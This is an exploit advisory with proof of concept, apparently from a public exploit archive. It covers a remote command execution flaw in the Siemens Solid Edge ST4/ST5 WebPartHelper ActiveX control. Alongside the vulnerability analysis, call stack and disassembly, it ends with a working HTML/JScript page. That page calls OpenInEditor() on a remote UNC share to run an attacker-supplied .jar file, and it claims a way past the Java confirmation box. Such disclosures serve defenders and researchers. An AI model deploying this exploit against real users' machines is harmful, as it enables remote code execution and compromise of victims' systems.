SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution

Author: rgod
Platform: windows
Release date: 2013-05-26

SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control 
RFMSsvs!JShellExecuteEx Remote Command Execution 

Tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 8

Software description: http://en.wikipedia.org/wiki/Solid_Edge

Vendor site: http://www.siemens.com/entry/cc/en/

Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

File tested: SolidEdgeV104ENGLISH_32Bit.exe

Background:

The mentioned software installs an ActiveX control with 
the following settings:

CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

This control *implements* IObjectSafety: IE queries the IObjectSafety
interface for "Safe for Initialization with data" and "Safe For Scripting".

Because the control reports itself as Safe for Scripting through IObjectSafety,
IE allows scripting of this control, subject to the browser security settings.

Vulnerability:

The WebPartHelper class exposes the OpenInEditor() method; from the typelib:

...
  /* DISPID=8 */
function OpenInEditor(
        /* VT_VARIANT [12] [in] */ $URL
        )
{
}
...

By passing a null-session share path as the URL argument of this method,
it is possible to launch an arbitrary executable.

This is because of a ShellExecuteExW() call inside RFMSsvs.dll.

Call stack when ShellExecuteExW() is called:

Address    Stack      Procedure / arguments                 Called from                   Frame
01B7E140   04AC9F0E   SHELL32.ShellExecuteExW               RFMSsvs.04AC9F08              01B7F280
01B7F284   022B71AD   ? <jmp.&RFMSsvs.JShellExecuteEx>      WPHelper.022B71A8             01B7F280
01B7F560   022B85B6   WPHelper.022B6D70                     WPHelper.022B85B1             01B7F55C
01B7F5D4   022B87A5   ? WPHelper.022B8380                   WPHelper.022B87A0             01B7F5D0
01B7F620   022B89CB   WPHelper.022B8710                     WPHelper.022B89C6             01B7F61C
01B7F668   7D0E5186   Includes WPHelper.022B89CB            OLEAUT32.7D0E5184             01B7F664
01B7F690   7D0F4ACF   ? OLEAUT32.DispCallFunc               OLEAUT32.7D0F4ACA             01B7F68C
01B7F720   022B58C3   Includes OLEAUT32.7D0F4ACF            WPHelper.022B58C1             01B7F71C
01B7F748   40302C02   Includes WPHelper.022B58C3            jscript.40302BFF              01B7F744
01B7F784   40302B6F   jscript.40302B90                      jscript.40302B6A              01B7F780
01B7F7C0   40302AFA   jscript.40302B2E                      jscript.40302AF5              01B7F7BC
01B7F834   40303555   ? jscript.40302A88                    jscript.40303550              01B7F830
01B7F878   40301221   jscript.4030122A                      jscript.4030121C              01B7F874
01B7F8B8   403011D6   jscript.403011E1                      jscript.403011D1              01B7F8B4
01B7F8DC   4030312D   jscript.40301182                      jscript.40303128              01B7F8D8


WPHelper.dll:
...
022B718A   899D 74FDFFFF    mov dword ptr ss:[ebp-28C],ebx
022B7190   8D85 D8FDFFFF    lea eax,dword ptr ss:[ebp-228]
022B7196   50               push eax
022B7197   8D8D 60FDFFFF    lea ecx,dword ptr ss:[ebp-2A0]
022B719D   51               push ecx
022B719E   C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1
022B71A8   E8 ADBB0100      call <jmp.&RFMSsvs.JShellExecuteEx>
...


RFMSsvs.dll:
...
04AC9ECF   8B85 A4EFFFFF    mov eax,dword ptr ss:[ebp-105C]
04AC9ED5   8D8D 4CEFFFFF    lea ecx,dword ptr ss:[ebp-10B4]
04AC9EDB   8946 24          mov dword ptr ds:[esi+24],eax
04AC9EDE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9EE4   8946 10          mov dword ptr ds:[esi+10],eax
04AC9EE7   C645 FC 02       mov byte ptr ss:[ebp-4],2
04AC9EEB   8D8D D8EEFFFF    lea ecx,dword ptr ss:[ebp-1128]
04AC9EF1   E8 6A89F1FF      call RFMSsvs.??1JrfmsFileName@@QAE@XZ
04AC9EF6   EB 0F            jmp short RFMSsvs.04AC9F07
04AC9EF8   8D8D 84EFFFFF    lea ecx,dword ptr ss:[ebp-107C]
04AC9EFE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9F04   8946 10          mov dword ptr ds:[esi+10],eax        ; eax -> "\\192.168.2.100\uncshare\CmdExec.jar"
04AC9F07   56               push esi
04AC9F08   FF15 E8E6CB04    call dword ptr ds:[<&SHELL32.ShellExecuteExW>]                          ; SHELL32.ShellExecuteExW
...

Proof of concept code is attached.
Note that by pointing OpenInEditor() (and consequently ShellExecuteExW())
at a remote .jar file, as handled by JRE/JDK 7u21, it is possible to bypass
the usual confirmation box.

<!--
SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
Remote Command Execution PoC

CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>

  var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
   
  //launch calc.exe
  //obj.OpenInEditor("c:\\windows\\system32\\calc.exe");

  //bypass the confirmation box, JRE/JDK7u21
  obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");


</script>
</html>